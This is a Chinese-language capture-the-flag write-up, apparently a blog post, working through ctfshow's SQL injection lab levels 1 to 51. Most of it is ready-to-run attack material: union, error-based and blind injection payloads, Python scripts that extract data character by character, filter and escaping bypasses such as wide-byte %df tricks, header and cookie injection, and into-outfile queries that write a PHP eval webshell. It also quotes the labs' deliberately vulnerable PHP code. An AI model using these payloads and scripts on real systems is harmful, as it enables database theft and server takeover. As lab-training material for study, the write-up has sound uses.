草率地记录一下
文章目录
- 1——字符型
- 2——数字型
- 3——单引号、括号闭合
- 4——双引号、括号闭合
- 5、6——单引号与双引号的报错注入
- 7——字符型注入,导出文件`into out_file "/..../"`
- 8——GET型、单引号字符型,bool盲注
- 9、10——GET型、单引号与双引号的字符型,时间盲注
- 11——POST型、单引号的字符型注入
- 12——POST型、双引号的字符型注入
- 13、14——POST型、单引号与双引号的字符型,bool盲注
- 15——基于bool型/时间延迟单引号POST型盲注
- 16——基于bool型/时间延迟的双引号POST型盲注
- 17——基于报错的更新查询POST注入
- 18——基于HTTP头的UA、 POST报错注入
- 19——基于HTTP头的Referer POST报错注入
- 20——基于错误的Cookie头部POST注入
- 21——基于错误的复杂的字符型Cookie注入
- 22——基于报错的双引号字符型Cookie注入
- 23——基于报错的,过滤注释的GET型
- 24——基于报错的,过滤注释的GET型
- 25、25a——过滤了or和and(双写、管道符)
- 26——过滤了..很多
- 26a——bool盲注
- 27——过滤select、union
- 27a——过滤select、union
- 28、28a——过滤select、union
- 29、30、31——双服务器
- 32、33——Bypass `addslashes()`、GET型宽字节注入
- 34——Bypass `addslashes()`、POST型宽字节注入、`�`
- 35——Bypass `addslashes()`、数字型宽字节注入
- 36——`MySQL_real_escape_string`
- 37——`MySQL_real_escape_string`
- 38——`MySQL_real_escape_string`
- 39——堆叠注入
- 40——
- 41——
- 41——
- 42——
- 43——order by 注入
- 44——order by 注入
- 45——order by 注入
- 46——order by 注入
- 47——order by 注入
- 51——order by 注入
1——字符型
id=-1' union select 1,database(),(select group_concat(flag) from ctfshow.flag )-- -
2——数字型
?id=-1 union select 1,database(),(select group_concat(flagac) from ctfshow.flagaa )-- -
(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')
(select group_concat(column_name) from information_schema.columns where table_name='flagaanec')
3——单引号、括号闭合
4——双引号、括号闭合
?id=-1") union select 1,2,(select group_concat(flag23) from ctfshow.flagsf)-- -
5、6——单引号与双引号的报错注入
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
print_r(mysql_error()); //报错信息
}
1' and updatexml(1,concat(0x7e,substr((select group_concat(flag33) from ctfshow.flagpuck),15,32),0x7e),1)-- -
1" or extractvalue(1,concat(0x7e,mid((select group_concat(flag3a3) from ctfshow.flagpa) from 15 for 32),0x7e))-- -
7——字符型注入,导出文件into out_file "/..../"
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in.... Use outfile......';
}else{
echo 'You have an error in your SQL syntax';
}
?id=1')) union select 0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e into outfile "/var/www/html/2.txt" -- -
....
?id=1')) union select 0x7e,(select group_concat(flag43) from ctfshow.flagdk),0x7e into outfile "/var/www/html/4.txt" -- -
也可以写一句话,但不好搞到flag…
?id=1')) union select null,0x3c3f706870206576616c28245f504f53545b315d293b3f3e,null into outfile "/var/www/html/1.php" -- -
8——GET型、单引号字符型,bool盲注
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
}
盲注脚本:
import requests
import time
url='http://92b86b48-8308-4f3d-8546-a3bba979db12.challenge.ctf.show:8080/?id='
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#payload="1' and 1=if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},1,0)-- -".format(i,mid)
#payload="1' and 1=if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagjugg')),{},1))<{},1,0)-- -".format(i,mid)
payload="1' and 1=if(ascii(substr((select/**/group_concat(flag423)from(ctfshow.flagjugg)),{},1))<{},1,0)-- -".format(i,mid)
#print(url+payload)
print(url+payload)
r=requests.get(url=url+payload).text
#print(r)
if 'You' in r:
max=mid
else:
min=mid
# time.sleep(0.5)
# time.sleep(0.5)
9、10——GET型、单引号与双引号的字符型,时间盲注
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
echo 'You are in...........';
}
import requests
import time
url='http://01faf912-1730-485f-b5b4-01f0107b62ec.challenge.ctf.show:8080/?id='
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#payload="1' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
#payload="1' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagug')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
payload="1' and if(ascii(substr((select/**/group_concat(flag4a23)from(ctfshow.flagug)),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
print(url+payload)
try:
r=requests.get(url=url+payload,timeout=0.5).text
min=mid
except:
max=mid
time.sleep(0.3)
time.sleep(0.3)
11——POST型、单引号的字符型注入
在用户名处联合查询注入(也可以报错注入)
-1' union select 1,(select group_concat(flag43s) from ctfshow.flagugsd)#
12——POST型、双引号的字符型注入
利用报错信息知道:双引号、括号的闭合
-1") union select 1,(select group_concat(flag43as) from ctfshow.flagugsds)#
也可以报错注入
13、14——POST型、单引号与双引号的字符型,bool盲注
admin') and 1;# 发现页面返回flag.jpg
admin') and 0;# 返回slap.jpg
import requests
import time
url='http://3ae786d0-1fe7-471e-9aee-4255845dffc9.challenge.ctf.show:8080/'
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#-1') or sleep(10);#
#payload="admin') and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},1,0)-- -".format(i,mid)
#payload="admin') and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),{},1))<{},1,0)-- -".format(i,mid)
payload="admin') and if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{},1))<{},1,0)-- -".format(i,mid)
print(payload)
data={
'passwd':'a',
'uname':payload,
}
#try:
r=requests.post(url=url,data=data).text
if 'flag' in r:
max=mid
#print(r)
#except:
else:
min=mid
# time.sleep(0.3)
# time.sleep(0.3)
15——基于bool型/时间延迟单引号POST型盲注
admin' and sleep(5)-- -
import requests
import time
url='http://d677bfbf-5339-4f53-9301-e717d4e3381a.challenge.ctf.show:8080/'
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#payload="admin' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
#payload="admin' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagba')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
payload="admin' and if(ascii(substr((select/**/group_concat(flag4sa)from(ctfshow.flagba)),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
print(payload)
data={
'passwd':'a',
'uname':payload,
}
try:
r=requests.post(url=url,data=data,timeout=0.5).text
min=mid
except:
max=mid
# time.sleep(0.3)
# time.sleep(0.3)
16——基于bool型/时间延迟的双引号POST型盲注
admin") and sleep(5)-- -
17——基于报错的更新查询POST注入
$uname=check_input($_POST['uname']); //check_input函数对unam进行过滤
$passwd=$_POST['passwd']; //但没有过滤passwd
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
单单过滤了uname,没有针对passwd进行过滤
passwd=DMIND' and updatexml(1,concat(0x7e,database(),0x7e),1) or '&submit=Submit&uname=admin
可以报错注入:
1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),0x7e))#
1' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag"),0x7e))#
1' or extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),15,32),0x7e))#
18——基于HTTP头的UA、 POST报错注入
注入点在HTTP头的UA出
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);}
}
对passwd和uname都进行了过滤了,但$uagent取自UA头,没有过滤因此可以利用
因为UA处有回显,利用extractvalue()报错注入
1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
放进sql语句中:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '', '$IP', $uname)";
1' and extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),20,30),0x7e)) and '
19——基于HTTP头的Referer POST报错注入
注入点换成了Referer,操作和上面的一样
20——基于错误的Cookie头部POST注入
注入点换成了Cookie,操作和上面的一样
21——基于错误的复杂的字符型Cookie注入
base64编码,单引号,报错型,cookie型注入。
多了一个base64_decode的过程,所以我们只要把之前的payload进行base64加密即可
加密前:
admin') and extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),20,30),0x7e))#
22——基于报错的双引号字符型Cookie注入
base64编码,双引号,报错型,cookie型注入。
加密前:
admin" and extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),1,30),0x7e))#
23——基于报错的,过滤注释的GET型
if(isset($_GET['id']))
{
$id=$_GET['id'];
//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
}
过滤了注释符:#和--,利用and '1'='1闭合SQL语句最后的单引号,继续报错注入
?id=1' or extractvalue(1,concat(0x7e,database(),0x7e)) or '1'='1
......
?id=1' or extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),1,30),0x7e)) or '1'='1
24——基于报错的,过滤注释的GET型
问题出在pass_change.php(修改密码)这个文件中,变量$username是直接被传递的而没有经过mysql_real_escape_string()的过滤,然后直接放在了UPDATE的语句中。$username就是我们登录的用户名,登录成功就会有$_SESSION["username"],
import requests
import time
session = requests.session()
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#D' or sleep(2) or '1'='1
#payload="DMIND' or if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0) or'1'='1".format(i,mid)
#payload='admin") and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flagbab")),{},1))<{},sleep(0.5),0)-- -'.format(i,mid)
payload="DMIND' or if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{},1))<{},sleep(0.1),0) or '1'='1".format(i,mid)
print(payload)
url1='http://ca8a2eff-9507-41f3-ba9a-8315233eafd8.challenge.ctf.show:8080/login_create.php'
data1={
'username':payload,
'password':'a',
're_password':'a',
'submit':'Register'
}
res1 =session.post(url1,data=data1).text
url2='http://ca8a2eff-9507-41f3-ba9a-8315233eafd8.challenge.ctf.show:8080/login.php'
data2={
'login_user':payload,
'login_password':'a',
'mysubmit':'Login'
}
res2 =session.post(url2,data=data2).text
url3='http://ca8a2eff-9507-41f3-ba9a-8315233eafd8.challenge.ctf.show:8080/pass_change.php'
data3={
'current_password': 'a',
'password':'a',
're_password':'a',
'submit':'Reset '
}
try:
res3 =session.post(url3,data=data3,timeout=0.1).text
min=mid
except:
max=mid
25、25a——过滤了or和and(双写、管道符)
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
测试一下:
?id=1' or sleep(5)-- - 无延时
?id=1' || sleep(5)-- - 有延时(less-25)
?id=1 || sleep(5)-- - 有延时(less-26)
过滤了or和and,但可以双写绕过啊
?id=-1' union select 1,2,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow')-- -
?id=-1' union select 1,2,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags')-- -
?id=-1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags)-- -
26——过滤了…很多
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
过滤了:or、and、/*、--、#、空格、斜杠
空格通常有这些绕过,
%20 空格
%09 TAB 键(水平)
%0b TAB 键(垂直)
%0d return 功能
%0c 新的一页
%a0 空格
%0a 新建一行
但这些在这里都不起作用,可以用管道符,配合if、extractvaule等语句,这些语句很少用到空格。可以测试一下延时注入,注意末尾的'0是为了闭合语句的单引号,且不能为1
a'||if(1=1,sleep(5),0)||'0
但既然都能用1 or sleep(1) or '0的句式了,中间换成报错语句也可以尝试一下:1 or extractvalue(1,1) or '0
?id=a'||extractvalue(1,concat(0x7e,user(),0x7e))||'0
用报错注入:用括号绕过空格
?id=a'||extractvalue(1,concat(0x7e,substr((select(flag4s)from(ctfshow.flags)),15,32),0x7e))||'0
26a——bool盲注
这题用报错注入不成功,…然后想着用延时的,但发现脚本跑出来的内容有偏差(我脚本的问题?),然后就懵了…
看Y4大佬的才知道用到了bool盲注而不是时间盲注,淦大意了,忘记了这个
?id=a')||if(1=0,1,0)||('0 不能回显id为1的信息
?id=a')||if(1=1,1,0)||('0 能回显id为1的信息
import requests
import time
url='http://d81d5378-380f-4514-b4fc-58bf1af836ba.challenge.ctf.show:8080/'
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#id=a')||if(1=1,sleep(5),0)||('0
#payload="admin' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
#payload="admin' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagba')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
payload="a')||if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{},1))<{},1,0)||('0".format(i,mid)
print(payload)
data={
'id':payload
}
r=requests.get(url=url,params=data,timeout=1).text
if 'Dumb' in r:
max=mid
else:
min=mid
# try:
# r=requests.get(url=url,params=data,timeout=1).text
# min=mid
# except:
# max=mid
# time.sleep(0.3)
# time.sleep(0.3)
27——过滤select、union
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
没有用/i修饰符来过滤,可以大小写绕过select关键词
?id=a'||extractvalue(1,concat(0x7e,substr((sEleCt(flag4s)from(ctfshow.flags)),1,32),0x7e))||'0
27a——过滤select、union
换成了双引号,用报错又不成功…
import requests
import time
url='http://31ba5ceb-d1f0-4f2d-99a4-a375cb274496.challenge.ctf.show:8080/'
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#id=a"||if(1=0,1,0)||"0
#payload="admin' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
#payload="admin' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagba')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
payload='a"||if(ascii(substr((sEleCt(group_concat(flag4s))from(ctfshow.flags)),{},1))<{},1,0)||"0'.format(i,mid)
print(payload)
data={
'id':payload
}
r=requests.get(url=url,params=data,timeout=1).text
if 'Dumb' in r:
max=mid
else:
min=mid
# try:
# r=requests.get(url=url,params=data,timeout=1).text
# min=mid
# except:
# max=mid
# time.sleep(0.3)
# time.sleep(0.3)
28、28a——过滤select、union
('的闭合
import requests
import time
url='http://04b40f35-7758-4fc4-9114-d74500be76c8.challenge.ctf.show:8080/'
flag=''
for i in range(1,100):
min=32
max=128
while 1:
mid=min+(max-min)//2
if min==mid:
flag+=chr(mid)
print(flag)
if chr(mid)=='}':
exit()
break
#id=a"||if(1=0,1,0)||"0
#payload="admin' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
#payload="admin' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagba')),{},1))<{},sleep(0.5),0)-- -".format(i,mid)
payload="a')||if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{},1))<{},1,0)||('0".format(i,mid)
print(payload)
data={
'id':payload
}
r=requests.get(url=url,params=data,timeout=1).text
if 'Dumb' in r:
max=mid
else:
min=mid
# try:
# r=requests.get(url=url,params=data,timeout=1).text
# min=mid
# except:
# max=mid
# time.sleep(0.3)
# time.sleep(0.3)
29、30、31——双服务器
apache是最终处理并返回数据的服务器,但在它接收到数据前还有个tomcat服务器,它的存在一般都是起到过滤数据的作用(类似WAF那样吧)
按理来说似乎没问题,但这里的问题就出在两个服务器处理的数据不一致,如下图,Apache获取的是最后一个参数,但Tomcat获取第一个参数,如果把Tomcat当作WAF使用,是完全起不到作用的,因为可以参数污染
index.php?id=1&id=2' union select....
上面这例子就是参数污染,Tomcat接收第一个参数发现没问题,发送请求给Apache,但Apache是接收最后一个有问题的参数!
payload:
?id=2&id=-1'union select 1,2,group_concat(flag4s) from ctfshow.flags-- +
32、33——Bypass addslashes()、GET型宽字节注入
问题代码:
mysql_query("SET NAMES gbk");
造成宽字节注入的原因就是gbk编码的不合理设置, %df、%81、%E6均可绕过
?id=%df' union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
34——Bypass addslashes()、POST型宽字节注入、�
这里要注意直接在浏览器里提交%df'会被URL编码,因为是POST传参。%df被编码为%25df,这时候就不成功了,所以可以在burp里提交%df。
看Y4大佬是直接提交�'的,直接将�当作%df被utf-8解码过的字符提交上去,学到了!�的编码是%EF%BF%BD
对POST、GET型宽字节注入传参的分析:
抓包后,Content-Type: application/x-www-form-urlencoded,当出现这个标识头的时候,目标站点会URL编码解码
POST强行编码,无选择编码
GET统一编码,有选择编码
- GET传参,URL检查到了%xx不会理会,即不会进行多余的编码
- URL检查到了',会将其变为%27
讲讲三种输入方式的流程:
GET方式:传入 %df' 经过浏览器URL编码后为:%df%5c%27(即%df\'),经过gbk对这些解码为:運'
POST方式: 传入 %df'经过浏览器URL编码后为:%25df%5c%27,经过gbk对这些解码为:%df\' 这里的单引号就被转义而无法起到闭合的作用了
GET、POST方式:传入 �'经过浏览器URL编码后为:%EF%BF%BD%5C%27,经过gbk对这些解码为:锟絓'
很明显,第一第三种都起到了闭合单引号的作用,但第二种输入方式是不行的
35——Bypass addslashes()、数字型宽字节注入
addslashes()对数字型的SQL语句基本不起作用,直接union注入就好了
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
36——MySQL_real_escape_string
MySQL_real_escape_string也会对单引号进行转义加斜杠,
?id=-1�' union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
37——MySQL_real_escape_string
测试语句:
�' union select 1,3#
38——MySQL_real_escape_string
和前面太相似了,就是换个了函数,但都会造出斜杠从而被利用
?id=�' union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
39——堆叠注入
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
......
}
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。(有这个才能进行堆叠)
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
40——
?id=-1') union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
41——
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
41——
在密码处进行报错注入:
aa' or extractvalue(1,concat(0x7e,user(),0x7e))-- -
aa' or extractvalue(1,concat(0x7e,mid((select group_concat(flag4s) from ctfshow.flags),20,30),0x7e))-- -
42——
aa') or extractvalue(1,concat(0x7e,mid((select group_concat(flag4s) from ctfshow.flags),1,30),0x7e))-- -
43——order by 注入
$sql = "SELECT * FROM users ORDER BY $id";
order by注入不同于where后面的注入,它不可以使用union联合查询注入
测试order by的语句:看看是否有不同的显示顺序
?sort=1 asc 顺序
?sort=1 desc 倒序
报错注入、时间盲注都行
?sort=1 or extractvalue(1,concat(0x7e,mid((select group_concat(flag4s) from ctfshow.flags),1,30),0x7e))
44——order by 注入
?sort=1' or extractvalue(1,concat('~',mid((select group_concat(flag4s) from ctfshow.flags),1,30),'~'))-- -
45——order by 注入
?sort=1 into outfile '/var/www/html/1.php' lines terminated by '<?php eval($_POST[1]);?>' -- -
46——order by 注入
写shell的几种方式:
1:union select 写入
select * from stu where id=1 union select 1,2,'<?=phpinfo();?>' into dumpfile '/var/www/html/1.php'-- -
2. lines terminated by 写入(在行末尾写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' lines terminated by '<?php phpinfo() ?>'-- -
3.lines starting by 写入(在行头写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' lines starting by '<?php phpinfo() ?>'-- -
4.fields terminated by 写入(在每个字段后写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' fields terminated by '<?php phpinfo() ?>'-- -
5.columns terminated by 写入(在每个字段后写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' columns terminated by '<?php phpinfo() ?>'-- -
写shell:
?sort=1 into outfile "/var/www/html/1.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e -- -
方法一:在浏览器上操作
1=include './sql-connections/db-creds.inc';
include './sql-connections/sql-connect-1.php';
$sql="SELECT flag4s FROM ctfshow.flags";
$result=mysql_query($sql) or die("error in function table_name()".mysql_error());
$row = mysql_fetch_array($result);
print_r($row);
方法二:在蚁剑上操作(这个简单一点)
蚁剑连接一下即可,连接数据库的信息在var/www/html/sql-connections/db-creds.inc
47——order by 注入
?sort=1 into outfile "/var/www/html/1.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e -- -
类似上面
51——order by 注入
多了个单引号来闭合
扫一扫
1241
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
